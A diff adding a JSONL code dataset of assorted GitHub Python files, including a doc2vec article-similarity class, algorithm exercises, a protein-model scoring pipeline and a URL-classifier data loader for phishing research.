diff --git "a/5054.jsonl" "b/5054.jsonl" new file mode 100644--- /dev/null +++ "b/5054.jsonl" @@ -0,0 +1,883 @@ +{"seq_id":"18677300698","text":"from gensim.models import Doc2Vec\nfrom gensim import matutils\n\n\nfrom technews_nlp_aggregator.nlp_model.common import defaultTokenizer\nfrom technews_nlp_aggregator.common.util import get_start_and_end\nMODEL_FILENAME = 'doc2vec'\nimport pandas as pd\n\nimport numpy as np\nfrom gensim.models.doc2vec import TaggedDocument\nfrom datetime import timedelta\nimport logging\n\n\nclass LabeledLineSentence(object):\n def __init__(self, idxlist, texts):\n self.doc_list = idxlist\n self.texts = texts\n\n def __iter__(self):\n for idx, text in zip(self.doc_list, self.texts):\n wtok = text\n tags = [idx]\n\n yield TaggedDocument(words=wtok, tags=tags)\n\n\nclass Doc2VecFacade():\n\n def __init__(self, model_dir, article_loader=None, gramFacade=None, tokenizer=None, window=10, min_count=5, sample=0.001, epochs=30, alpha=0.1, vector_size=400, batch_size=10000, queue_factor=2, workers=8, version=1):\n\n self.model_dir = model_dir\n self.article_loader = article_loader\n self.name=\"DOC2VEC-V\"+str(version)\n self.gramFacade = gramFacade\n self.tokenizer = defaultTokenizer if not tokenizer else tokenizer\n self.window=window\n self.min_count=min_count\n self.sample = sample\n self.epochs = epochs\n self.alpha = alpha\n self.vector_size = vector_size\n self.batch_size = batch_size\n self.queue_factor = queue_factor\n self.workers = workers\n\n def load_models(self):\n model_filename = self.model_dir+'/'+MODEL_FILENAME\n self.model = Doc2Vec.load(model_filename)\n\n def get_vector(self, doc, title='', merge_unlemmaed=False):\n tokenized_doc = self.get_tokenized(doc=doc, title=title, merge_unlemmaed=merge_unlemmaed)\n return self.get_vector_from_tokenized(tokenized_doc)\n\n\n def get_vector_from_tokenized(self, tokenized):\n infer_vector = self.model.infer_vector(tokenized, epochs=self.epochs, alpha=self.alpha)\n logging.debug(\"DOC2VEC: infer_vector {} has shape {}\".format(infer_vector, infer_vector.shape))\n return infer_vector\n\n\n\n def get_score_id_id(self, id1, id2):\n docvec1 = self.model.docvecs.doctag_syn0[id1]\n docvec1 = matutils.unitvec(docvec1)\n docvec2 = self.model.docvecs.doctag_syn0[id2]\n docvec2 = matutils.unitvec(docvec2)\n\n return np.dot(docvec1, docvec2.T)\n\n def get_score_doc_doc(self, tok1, tok2):\n\n docvec1 = self.get_vector_from_tokenized(tok1)\n docvec1 = matutils.unitvec(docvec1)\n docvec2 = self.get_vector_from_tokenized(tok2)\n\n docvec2 = matutils.unitvec(docvec2)\n if (len(docvec1) == len(docvec2)):\n return np.dot(docvec1, docvec2.T)\n else:\n return 0\n\n def get_tokenized(self, doc, title, merge_unlemmaed=False):\n wtok = self.tokenizer.tokenize_doc(title=title, doc=doc, do_lemma=True)\n if merge_unlemmaed:\n wtok += self.tokenizer.tokenize_doc(title=title, doc=doc, do_lemma=False)\n p_wtok = self.gramFacade.phrase(wtok)\n logging.debug(\"doc2vec_facade.get_tokenized returns {}\".format(p_wtok))\n return p_wtok\n\n def get_related_articles_and_score_doc(self, doc, title= '', start=None, end=None, merge_unlemmaed=False):\n infer_vector = self.get_vector(doc, title, merge_unlemmaed=merge_unlemmaed)\n articleModelDF = self.article_loader.articlesDF.iloc[:self.model.docvecs.doctag_syn0.shape[0]]\n if (start and end):\n interval_condition = (articleModelDF ['date_p'] >= start) & (articleModelDF ['date_p'] <= end)\n articlesFilteredDF = articleModelDF [interval_condition]\n dindex = articlesFilteredDF.index\n indexer = DocVec2Indexer(self.model.docvecs,dindex )\n scores = self.model.docvecs.most_similar([infer_vector], topn=None, indexer=indexer)\n\n else:\n scores = self.model.docvecs.most_similar([infer_vector], topn=None)\n articlesFilteredDF = articleModelDF\n dindex = articlesFilteredDF.index\n\n args_scores = np.argsort(-scores)\n new_index = articlesFilteredDF.iloc[args_scores].index\n df = pd.DataFrame(scores[args_scores], index=new_index, columns=['score'])\n return df\n\n def get_related_articles_for_id(self, id, d_days):\n articleDF = self.article_loader.articlesDF.iloc[:self.model.docvecs.doctag_syn0.shape[0]]\n url_date = articleDF.iloc[id]['date_p']\n\n\n start, end = get_start_and_end(url_date, d_days)\n interval_condition = (articleDF['date_p'] >= start) & (articleDF['date_p'] <= end)\n\n articlesFilteredDF = articleDF[interval_condition]\n logging.info(\n \"DOC2Vec: Found {} articles similar to {} between {} and {} \".format(len(articlesFilteredDF ), id, start, end))\n\n dindex = articlesFilteredDF.index\n indexer = DocVec2Indexer(self.model.docvecs, dindex)\n scores = self.model.docvecs.most_similar([id], topn=None, indexer=DocVec2Indexer(self.model.docvecs, dindex))\n args_scores = np.argsort(-scores)\n new_index = articlesFilteredDF.iloc[args_scores].index\n df = pd.DataFrame(scores[args_scores], index=new_index , columns=['score'])\n return df\n\n def create_model(self, texts):\n it = LabeledLineSentence(range(len(texts)), texts)\n logging.info(\"Creating model with {} texts\".format(len(texts)))\n self.model = Doc2Vec(size=self.vector_size, window=self.window, workers=self.workers, alpha=self.alpha, min_alpha=0.0001,\n epochs=self.epochs, min_count=self.min_count, sample=self.sample, batch_words=self.batch_size) # use fixed learning rate\n self.model.build_vocab(it)\n\n logging.info(\"Starting to train......\")\n\n self.model.train(it, total_examples=self.model.corpus_count, epochs=self.epochs, queue_factor=self.queue_factor)\n\n logging.info(\"Training completed, saving to \" + self.model_dir)\n self.model.save(self.model_dir + MODEL_FILENAME)\n\n def docs_in_model(self):\n return self.model.docvecs.doctag_syn0.shape[0]\n\n\nclass DocVec2Indexer():\n def __init__(self, doc2vec, dindex):\n self.doc2vec = doc2vec\n\n self.dindex = dindex\n\n\n\n def most_similar(self, mean, topn):\n dists = np.dot(self.doc2vec.doctag_syn0norm[self.dindex], mean)\n return dists\n","repo_name":"diegoami/newscollection","sub_path":"technews_nlp_aggregator/nlp_model/publish/doc2vec_facade.py","file_name":"doc2vec_facade.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"42374904031","text":"\"\"\"Show uptime of a service.\"\"\"\n\nimport time\n\n\ndef uptime(start_uptime: time.perf_counter) -> str:\n \"\"\"Return human readable time elapsed since program start.\n\n Example usage:\n ```\n import time\n start_uptime = time.perf_counter()\n print(uptime(start_uptime))\n ```\n\n Args:\n start_uptime: A perf_counter object which is equivalent of calling\n now().\n\n Returns:\n String of time elapsed.\n \"\"\"\n units = {\n \"months\": 2629746, \"weeks\": 604800, \"days\": 86400,\n \"hours\": 3600, \"minutes\": 60, \"seconds\": 1\n }\n\n elapsed_sec = time.perf_counter() - start_uptime\n\n result = \"\"\n for unit, count in units.items():\n value = int(elapsed_sec // count)\n if value >= 1:\n if value == 1:\n unit = unit.rstrip(\"s\")\n result += f\"{value} {unit}, \"\n elapsed_sec -= (count * value)\n return result.rstrip(\", \")\n","repo_name":"xcollantes/uptime","sub_path":"uptime.py","file_name":"uptime.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24337972458","text":"from collections import deque\nimport sys\n\ndef dfs(x, y):\n # 상/하/좌/우 델타 선언\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n stack = deque([(x, y)])\n visited[x][y] = 1\n while stack: # 스택이 빌 때까지 반복\n x, y = stack.pop()\n for d in range(4): # 4방향 델타 탐색\n nx = x + dx[d]\n ny = y + dy[d]\n # (nx, ny)가 arr안에 있고, (x, y) 랑 같은 색이고, 방문한적 없으면 -> 방문처리 & 스택에 넣기\n if 0 <= nx < N and 0 <= ny < N and arr[x][y] == arr[nx][ny] and visited[nx][ny] == 0:\n visited[nx][ny] = 1\n stack.append((nx, ny))\n\nN = int(sys.stdin.readline())\narr = [list(sys.stdin.readline().strip()) for _ in range(N)]\ncnt, cnt_x = 0, 0 # 적록색약이 아닌 사람이 봤을 때 / 적록색약인 사람이 봤을 때\n# 적록색약이 아닌 사람이 봤을 때\nvisited = [[0] * N for _ in range(N)]\nfor i in range(N):\n for j in range(N):\n if visited[i][j] == 0: # 방문한적 없으면 같은 색 애들 dfs 탐색하기!!\n dfs(i, j)\n cnt += 1\n\n# 적록색약인 사람이 봤을 때(R / G 구분 못함 -> 하나로 통일시켜서 dfs 탐색)\nvisited = [[0] * N for _ in range(N)] # 방문처리하는 arr 초기화\nfor i in range(N):\n for j in range(N):\n if arr[i][j] == 'G':\n arr[i][j] = 'R'\nfor i in range(N):\n for j in range(N):\n if visited[i][j] == 0:\n dfs(i, j)\n cnt_x += 1\n\nprint(cnt, cnt_x)\n","repo_name":"nyoungnyoung/Personal","sub_path":"Study/220905_Q10026_적록색약dfs.py","file_name":"220905_Q10026_적록색약dfs.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31513994061","text":"import os \r\nimport re\r\n\r\n# problme statement \r\n# user need to remove extension of dot html from all the files and save them without extension \r\n\r\nlist = os.listdir(\"FULL PATH WHERE,HTML FILE EXIST\")\r\n\r\nfor filename in list:\r\n if \".html\" in filename:\r\n #replace\r\n new_name = re.sub('\\.html$', '', filename) \r\n os.rename(filename,new_name) \r\n \r\n \r\n else:\r\n # do not replace \r\n print(\"No Need\")","repo_name":"SyedSajjadHaider/LearnPython","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21010079310","text":"import sys\ninput = sys.stdin.readline\nt = int(input())\nfor _ in range(t):\n\torigin, compare = input().split()\n\tprint('Distances:', end = ' ')\n\tfor i in range(len(origin)):\n\t\tif ord(origin[i]) <= ord(compare[i]):\n\t\t\tprint( ord(compare[i]) - ord(origin[i]) , end = ' ')\n\t\telse:\n\t\t\tprint( ord(compare[i])+ 26 - ord(origin[i]), end = ' ')\n\tprint()","repo_name":"LeeJin0527/algorithm","sub_path":"BaekJoon/문자열(Easy)/5218 알파벳 거리.py","file_name":"5218 알파벳 거리.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"34726184932","text":"total = totmil = cont = menor = 0\nbarato = ''\n\nwhile True:\n produto = str(input('Nome do produto: '))\n preco = float(input('Preço: '))\n cont += 1\n total += preco\n if preco > 1000:\n totmil += 1\n if cont == 1 or preco < menor:\n menor = preco\n barato = produto\n resposta = ' '\n while resposta not in 'SN':\n resposta = str(input('Quer continuar[S/N]?' )).upper().strip()[0]\n if resposta == 'N':\n break\nprint('{:-^40}'.format('Fim do Programa'))\nprint(f'O total da compra foi R${total}')\nprint(f'Temos {totmil} produtos que custam mais de R$1.000')\nprint(f'O produto mais barato foi {barato} que custa R${menor}')\n","repo_name":"renatocortez/ExerciciosPython","sub_path":"ex070.py","file_name":"ex070.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"21038614895","text":"import sys\nimport time\n\n\nclass Solution:\n def fourSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n if len(nums) == 0:\n return []\n sorted_nums = sorted(nums)\n\n start_time = time.time()\n result = self.sum_rec(sorted_nums, target, 4)\n # result = self.sum_rec_set(set(nums), target, 4)\n end_time = time.time()\n print(str(end_time - start_time))\n return list(result)\n\n def sum_rec(self, nums, target, n):\n if len(nums) < n or target < nums[0] * n or target > nums[-1] * n:\n return []\n elif n == 2:\n return self.two_sum_set(nums, target)\n else:\n this_rec_result = []\n i = 0\n while i < len(nums):\n val = nums[i]\n new_target = target - val\n new_nums = nums[i + 1:]\n rec_result = self.sum_rec(new_nums, new_target, n - 1)\n for ele in rec_result:\n this_rec_result.append([val] + ele)\n while i < len(nums) and nums[i] == val:\n i += 1\n return this_rec_result\n\n def two_Sum(self, nums, target):\n if len(nums) > 0:\n this_rec_result = []\n i, j = 0, len(nums) - 1\n while i < j:\n cur_i_val = nums[i]\n cur_j_val = nums[j]\n if cur_i_val + cur_j_val == target:\n this_rec_result.append([cur_i_val, cur_j_val])\n while nums[i] == cur_i_val and i < j:\n i += 1\n while nums[j] == cur_j_val and i < j:\n j -= 1\n elif cur_i_val + cur_j_val > target:\n while nums[j] == cur_j_val and i < j:\n j -= 1\n else:\n while nums[i] == cur_i_val and i < j:\n i += 1\n return this_rec_result\n else:\n return []\n\n def two_sum_set(self, nums, target):\n d = set()\n result = set()\n for ele in nums:\n if target - ele in d:\n result.add((target - ele, ele))\n d.add(ele)\n return [list(item) for item in result]\n\n\ndef main(*args):\n solution = Solution()\n result = solution.two_sum_set([0, 0, 0, 0], 0)\n # result = solution.fourSum(\n # [1, 0, -1, 0, -2, 2],\n # 0\n # )\n\n print(result)\n\n\nif __name__ == '__main__':\n main(*sys.argv[1:])\n","repo_name":"hooyao/Coding-Py3","sub_path":"LeetCode/Problems/18_4sum.py","file_name":"18_4sum.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18520279869","text":"# test script\r\nimport os, sys\r\nimport errno\r\nimport gzip\r\nimport csv\r\nimport subprocess\r\nimport getopt\r\nimport logging\r\nimport time\r\n\r\ndefaultConfig = \"\"\"\r\npssh2_cache=\"/mnt/project/psshcache/result_cache_2014/\"\r\ntemp_work=\"/tmp/pssh2\"\r\nlocal_data=\"/var/tmp/rost_db/data/\"\r\nHHLIB=\"/usr/share/hhsuite/\"\r\n\"\"\"\r\n\r\n#default paths\r\nhhmmdir = '/usr/share/hhsuite/scripts/hhmakemodel.pl' \r\ndparam = '/mnt/project/aliqeval/HSSP_revisited/fake_pdb_dir/'\r\nmd5mapdir = '/mnt/project/pssh/pssh2_project/data/pdb_derived/pdb_redundant_chains-md5-seq-mapping'\r\nmayadir = '/mnt/home/andrea/software/mayachemtools/bin/ExtractFromPDBFiles.pl'\r\nmaxcldir = '/mnt/project/aliqeval/maxcluster'\r\n\r\ncleanup = True\r\n\r\n\r\ndef process_hhr(path, checksum, spath, sname):\r\n\thhrfile = gzip.open(path, 'rb')\r\n\ts = hhrfile.read()\t\r\n\t\r\n\ttry:\r\n\t\tos.makedirs(spath)\r\n\texcept OSError as exception:\r\n\t\tif exception.errno != errno.EEXIST:\r\n\t\t\traise\r\n\t\t\t\r\n\t\r\n\topen(spath+'/'+sname, 'w').write(s)\r\n\tparsefile = open(spath+'/'+sname, 'rb')\r\n\tlinelist = parsefile.readlines()\r\n\t\r\n\t#setting up loop vars\r\n\tbreaker = False\r\n\ti = -1\r\n\t\r\n\twhile (breaker==False):\r\n\t\ti = i - 1\r\n\t\tif (\"No \" in linelist[i]) and (len(linelist[i])<10):\r\n\t\t\tbreaker=True\r\n\t\t\r\n\t\ttakenline = linelist[i]\r\n\r\n\titerationcount = int(float(takenline.split(' ')[1]))\r\n\tprint('-- '+str(iterationcount)+' matching proteins found!')\r\n\t\r\n\r\n\thhrfile.close()\r\n\tparsefile.close()\r\n\treturn linelist, iterationcount\r\n\t\r\n\r\ndef proteins(md5):\r\n\tcsvfilename = 'result_'+md5\r\n\tchecksum = md5\r\n\t\r\n\t#set run-time paths\r\n\thhrpath = ('/mnt/project/aliqeval/HSSP_revisited/result_cache_2014/'+checksum[0:2]+'/'+checksum[2:4]+'/'+checksum+'/query.uniprot20.pdb.full.hhr.gz')\r\n\tsname = os.path.basename(hhrpath)[:-3]\r\n\tspath = '/mnt/project/aliqeval/HSSP_revisited/dinhtest/models/'+checksum[0:2]+'/'+checksum[2:4]+'/'+checksum\r\n\t\r\n\tif not (os.path.isfile(hhrpath)):\r\n\t\tprint('-- hhr does not exist, check md5 checksum!\\n-- stopping execution...')\r\n\t\treturn\r\n\tprint('-- hhr file found. Calling hhmakemodel to create pdb model...') \r\n\thhrdata = (process_hhr(hhrpath, checksum, spath, sname))\r\n\thhrlines, modelcount = hhrdata\r\n\t\r\n\t#hhmakemodel call, creating the models\r\n\tfor model in range(1, modelcount+1):\r\n\t\tprint('-- building model for protein '+str(model))\r\n\t\tsubprocess.call([hhmmdir, '-i '+spath+'/'+sname, '-ts '+spath+'/query.uniprot20.pdb.full.'+str(model)+'.pdb', '-d '+dparam,'-m '+str(model)])\r\n\r\n\t#grep md5 sum and get result back\r\n\tp = subprocess.Popen(['grep', checksum, md5mapdir], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n\tout, err = p.communicate()\r\n\tgrepresults = out.replace('\\t',' ').replace('\\n',' ').replace(' ',' ').strip().split(' ') #normalize the results from grepping\r\n\t\r\n\t#fool mayachemtools by creating a link to our .pdb...\r\n\t#ln -s /mnt/project/rost_db/data/pdb/entries/lj/pdb2lj7.ent experiment.pdb \r\n\r\n\tchainarray = [] #chain letters are being put into an array here\r\n\tfor v in range(len(grepresults)-2):\r\n\t\tchainarray.append(grepresults[v][-1:])\r\n\t\r\n\tresultArray = [[] for s in range(len(grepresults)-2)] #resultArray[m][n], m = index of chain (A = 0, B = 1...) n: 0 = model number, 1 = GDT, 2 = TM, 3 = RMSD\r\n\th = 0 #iterations through the chain array\r\n\tfor chain in chainarray: #iterating over how many chains we found\r\n\t\tpdbCode = grepresults[h][:-2]\r\n\t\tprint('-- creating .ent link to /mnt/project/rost_db/data/pdb/entries/'+grepresults[0][1:3]+'/pdb'+grepresults[0][:-2]+'.ent')\r\n\t\tif not os.path.isfile(spath+'/'+pdbCode+'.pdb'):\r\n\t\t\tsubprocess.call(['ln', '-s', '/mnt/project/rost_db/data/pdb/entries/'+grepresults[0][1:3]+'/pdb'+grepresults[0][:-2]+'.ent', spath+'/'+pdbCode+'.pdb'])\r\n\t\t\tprint('-- link created!')\r\n\t\telse:\r\n\t\t\tprint('-- link already exists. Using existing link...')\r\n\t\r\n\t\tsubprocess.call([mayadir, '-m', 'Chains', '-c', chain, spath+'/'+pdbCode+'.pdb'])\r\n\t\tsubprocess.call([mayadir, '-m', 'CAlphas', pdbCode+'Chain'+chain+'.pdb'])\r\n\t\t\r\n\t\t#maxcluster gdt comparison\r\n\t\tprint('-- performing maxcluster comparison, output to maxclres.log')\r\n\t\t#subprocess.call([maxcldir, '-gdt', '-e', 'experimentChainACAlphas.pdb', '-p', spath+'/query.uniprot20.pdb.full.1.pdb', '-log', 'maxclres.log'])\r\n\r\n\t\tfor i in range (1, modelcount+1): #iterating over the single models\r\n\t\t\tp = subprocess.Popen([maxcldir, '-gdt', '4', '-e', pdbCode+'Chain'+chain+'CAlphas.pdb', '-p', spath+'/query.uniprot20.pdb.full.'+str(i)+'.pdb'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n\t\t\t\r\n\t\t\tprint('-- maxCluster\\'d chain '+chain+ ' with model no. '+str(i))\r\n\t\t\t\r\n\t\t\tout, err = p.communicate()\r\n\t\t\t\r\n\t\t\tres = open('maxclres.log', 'a')\r\n\t\t\tres.write('== results for Chain '+chain+' compared to model '+str(i)+':\\n')\r\n\t\t\tres.write(out)\r\n\t\t\ttime.sleep(0.05)\r\n\t\t\r\n\t\tres.close()\r\n\t\ttime.sleep(2)\r\n\t\twith open('maxclres.log') as g:\r\n\t\t\tlines = g.readlines()\r\n\t\t\t\r\n\t\t#we have the chain letter currently available in the iteration, so we will just iterate over the result here\r\n\t\tprint('-- we got '+str(len(lines))+' lines')\r\n\t\tfor lineNo in range(0, len(lines)):\r\n\t\t\tif '== results for Chain '+chain+' compared to model' in lines[lineNo]:\r\n\t\t\t\tbrk = False\r\n\t\t\t\tit = 0\r\n\t\t\t\twhile brk == False:\r\n\t\t\t\t\tit = it+1\r\n\t\t\t\t\tif 'GDT=' in lines[lineNo+it]:\r\n\t\t\t\t\t\tbrk = True\r\n\t\t\t\t\t\tgdt = lines[lineNo+it].replace('GDT=','').strip()\r\n\t\t\t\t\r\n\t\t\t\trmsd = 0.000\r\n\t\t\t\ttm = 0.000\r\n\t\t\t\tif 'GDT= ' not in lines[lineNo+1]:\r\n\t\t\t\t\trmsd = lines[lineNo+1][26:31]\r\n\t\t\t\t\ttm = lines[lineNo+1][74:-2]\r\n\t\t\t\t\r\n\t\t\t\tresultArray[h].append((int((lines[lineNo].split(' ')[8])[:-2]), gdt, tm, rmsd))\r\n\t\th = h +1\r\n\t#create csvfile and writer object\r\n\tcsvfile = open(csvfilename+'.csv', 'w')\r\n\tcsvWriter = csv.writer(csvfile, delimiter=',')\r\n\tcsvWriter.writerow(['md5 checksum', 'Hit code', 'model number', 'avg. GDT', 'avg. TM', 'avg. RMSD', 'Prob.', 'E-value', 'P-value', 'HH score', 'Columns', 'Query HMM', 'Template', 'HMM'])\r\n\t\r\n\t\r\n\tfor i in range (modelcount): #iterating over the resultArray for every model\r\n\t\tprint(str(i)+' of modelcount = '+str(modelcount))\r\n\t\tavgGDT =0.000\r\n\t\tavgTM = 0.000\r\n\t\tavgRMSD = 0.000\r\n\t\tchainCount = 0\r\n\t\tfor j in range(len(chainarray)): #iterating for every chain\r\n\t\t\tif not float(resultArray[j][i][1])+float(resultArray[j][i][3])==0.000:\r\n\t\t\t\tchainCount += 1\r\n\t\t\t\tavgGDT += float(resultArray[j][i][1])\r\n\t\t\t\tavgTM += float(resultArray[j][i][2])\r\n\t\t\t\tavgRMSD += float(resultArray[j][i][3])\r\n\t\tblitsParseLine = hhrlines[9+i][36:]\r\n\t\tblitsParseLine = blitsParseLine.replace('(',' ')\r\n\t\tblitsParseLine = blitsParseLine.replace(')',' ')\r\n\t\twhile ' ' in blitsParseLine:\r\n\t\t\tblitsParseLine = blitsParseLine.replace(' ', ' ')\r\n\t\tblitsParseLine = blitsParseLine.split(' ')\r\n\r\n\t\tif avgGDT + avgRMSD == 0.000:\r\n\t\t\tcsvWriter.writerow([checksum, hhrlines[9+i][4:10], str(i+1), 'n/a', 'n/a', 'n/a', blitsParseLine[0], blitsParseLine[1], blitsParseLine[2], blitsParseLine[3], blitsParseLine[5], blitsParseLine[6], blitsParseLine[7], blitsParseLine[8]])\r\n\t\telse:\r\n\t\t\tcsvWriter.writerow([checksum, hhrlines[9+i][4:10], str(i+1), str(avgGDT/float(chainCount)), str(avgTM/float(chainCount)), str(avgRMSD/float(chainCount)), blitsParseLine[0], blitsParseLine[1], blitsParseLine[2], blitsParseLine[3], blitsParseLine[5], blitsParseLine[6], blitsParseLine[7], blitsParseLine[8]])\r\n\t\r\n\tcsvfile.close()\r\n\t\t\r\n\r\n#clean up everything\r\n\r\n\tif cleanup == True:\r\n\t\tprint('-- cleanup in 3 seconds...')\r\n\t\ttime.sleep(3)\r\n\t\tprint('-- deleting '+sname)\r\n\t\tsubprocess.call(['rm', spath+'/'+sname])\r\n\t\t\r\n\t\tprint('-- deleting '+sname[:-4]+'.*.pdb')\r\n\t\tfor z in range(1, modelcount+1):\r\n\t\t\tsubprocess.call(['rm', '-f', spath+'/'+sname[:-3]+str(z)+'.pdb'])\r\n\t\t\r\n\t\tprint('-- deleting mayachemtools pdbs')\r\n\t\tsubprocess.call(['rm', spath+'/'+pdbCode+'.pdb'])\r\n\t\tfor chain in chainarray: #iterating over how many PDBs we found\r\n\t\r\n\t\t\tsubprocess.call(['rm', pdbCode+'Chain'+chain+'.pdb'])\r\n\t\t\tsubprocess.call(['rm', pdbCode+'Chain'+chain+'CAlphas.pdb'])\r\n\t\t\r\n\tprint('-- deleting maxclres.log')\r\n\tsubprocess.call(['rm', 'maxclres.log'])\r\n\t\t\r\ndef usage():\r\n\tprint(\"Command line parameters for the proteins script:\")\r\n\tprint(\"-h/--help Displays this message\\n-m/--md5 Path to list of md5 sums of proteins to analyze.\")\r\n\tprint(\"-k/--keep Keep every model generated with the script. On default, models are being deleted after analysis.\")\r\n\t\t\r\n\t\r\ndef main(argv):\r\n\tmd5path = 'foo'\r\n\ttry:\r\n\t\topts, args = getopt.getopt(argv, \"hm:kd\", [\"help\", \"md5=\", \"keep\"])\r\n\texcept getopt.GetoptError:\r\n\t\tusage()\r\n\t\tsys.exit(2)\r\n\tif len(argv)<2:\r\n\t\tusage()\r\n\t\tsys.exit(2)\r\n\tfor opt, arg in opts:\r\n\t\tif opt in (\"-h\", \"--help\"):\r\n\t\t\tusage()\r\n\t\t\tsys.exit(2)\r\n\t\telif opt in (\"-m\", \"--md5\"):\r\n\t\t\tmd5path = arg\r\n\t\telif opt in (\"-k\", \"--keep\"):\r\n\t\t\tcleanup = False\r\n\t\r\n\tmd5listfile = open(md5path, 'rb')\r\n\tmd5list = md5listfile.readlines()\r\n\tfor chksm in md5list:\r\n\t\tproteins(chksm.replace(\"\\n\",\"\"))\r\n\t\r\n\r\n\r\nif __name__ == '__main__':\r\n \tmain(sys.argv[1:])\r\n\r\n\r\n\r\n\r\n\r\n\"\"\"\"\r\ntodo:\r\n- automate md5 checksum input (list)\r\n\"\"\"\r\n","repo_name":"aschafu/PSSH2","sub_path":"src/python/hssp_revisited/pythonscript_batch.py","file_name":"pythonscript_batch.py","file_ext":"py","file_size_in_byte":8892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38937514365","text":"import zipfile, urllib.request, shutil\nimport pandas as pd\nfrom pathlib import Path\n\n\nclass Data:\n\n _default_options = {\"unsafe\": True,\n \"safe\": True,\n \"top-1m\": True,\n \"tld-stats\": True}\n\n def __init__(self, options=None):\n print(\"Init Data class\")\n if options is None:\n options = self._default_options\n self._data = {}\n self._get_raw_datasets(options)\n\n def get_data(self):\n return self._data\n\n def _get_raw_datasets(self, options):\n if options[\"unsafe\"] or options[\"safe\"]: self._get_urls()\n if options[\"unsafe\"]: self._get_unsafe_urls()\n if options[\"top-1m\"]: self._get_safe_urls_top_1_million()\n if options[\"safe\"]: self._get_safe_urls()\n if options[\"tld-stats\"]: self._get_tld_stats()\n\n def _get_tld_stats(self):\n print(\"Retrieve tld stats database\")\n\n # remote https://w3techs.com/technologies/overview/top_level_domain/all\n local = \"./data/tld-stats.csv\"\n try:\n Path(local).resolve(strict=True)\n df = pd.read_csv(local, header=None)\n self._data[\"tld-stats\"] = dict(df.values)\n except FileNotFoundError:\n print(\"Cannot find\", local)\n\n def _get_unsafe_urls_phishtank(self):\n remote = \"http://data.phishtank.com/data/online-valid.csv\"\n print(\"[UNSAFE] Retrive PhishTank database\")\n df = pd.read_csv(remote)\n df = df[df['verified'] == 'yes']\n df = df[df['online'] == 'yes']\n return df.iloc[:, 1]\n\n def _get_unsafe_urls_cybercrime(self):\n print(\"[UNSAFE] Retrive CyberCrime database\")\n remote = \"http://cybercrime-tracker.net/all.php\"\n return pd.read_csv(remote, header=None)\n\n def _get_unsafe_urls_unb(self):\n print(\"[UNSAFE] Retrive University of New Brunswick Canadian Institute for Cybersecurity database\")\n local = \"./data/FinalDataset/URL/phishing_dataset.csv\"\n return pd.read_csv(local, header=None)\n\n def _get_unsafe_urls(self):\n print(\"[UNSAFE] Retrieve unsafe urls database\")\n\n local = \"./data/unsafe.csv\"\n try:\n Path(local).resolve(strict=True)\n except FileNotFoundError:\n df = self._get_unsafe_urls_phishtank()\n df = df.append(self._get_unsafe_urls_cybercrime(), ignore_index=True)\n df = df.append(self._get_unsafe_urls_unb(), ignore_index=True)\n df.to_csv(local, sep=',', encoding='utf-8', header=None, index=False)\n else:\n df = pd.read_csv(local)\n self._data[\"unsafe\"] = df\n\n def _get_urls(self):\n print(\"[SAFE|UNSAFE] Retrieve safe/unsafe urls database\")\n\n local = \"./data/ISCXURL2016.zip\"\n try:\n Path(local).resolve(strict=True)\n except FileNotFoundError:\n remote = \"https://iscxdownloads.cs.unb.ca/iscxdownloads/ISCX-URL-2016/ISCXURL2016.zip\"\n with urllib.request.urlopen(remote) as response, open(local, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n with zipfile.ZipFile(local) as zf:\n zf.extractall(\"./data\")\n\n def _get_safe_urls_top_1_million(self):\n print(\"[SAFE] Retrieve top 1 million websites database\")\n local = \"./data/top-1m.csv\"\n try:\n Path(local).resolve(strict=True)\n except FileNotFoundError:\n remote = \"http://s3.amazonaws.com/alexa-static/top-1m.csv.zip\"\n df = pd.read_csv(remote, compression='zip', header=None)\n df.to_csv(local, sep=',', encoding='utf-8', header=None, index=False)\n else:\n df = pd.read_csv(local, header=None)\n self._data[\"top-1m\"] = dict(map(reversed, dict(df.values).items()))\n return df\n\n def _get_safe_urls_unb(self):\n print(\"[SAFE] Retrive University of New Brunswick Canadian Institute for Cybersecurity database\")\n local = \"./data/FinalDataset/URL/Benign_list_big_final.csv\"\n return pd.read_csv(local, header=None)\n\n def _get_safe_urls(self):\n print(\"[SAFE] Retrieve safe urls database\")\n\n local = \"./data/safe.csv\"\n try:\n Path(local).resolve(strict=True)\n except FileNotFoundError:\n df = self._get_safe_urls_top_1_million()\n df = df.iloc[:, 1]\n df = df.append(self._get_safe_urls_unb(), ignore_index=True)\n df.to_csv(local, sep=',', encoding='utf-8', header=None, index=False)\n else:\n df = pd.read_csv(local)\n self._data[\"safe\"] = df\n","repo_name":"valkheim/url-classifier","sub_path":"data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"25713049413","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 16 10:37:47 2019\r\n\r\n@author: m\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nfrom trainIDCard import *\r\nfrom genIDCard import *\r\n\r\n#image size: 1080, 1440, 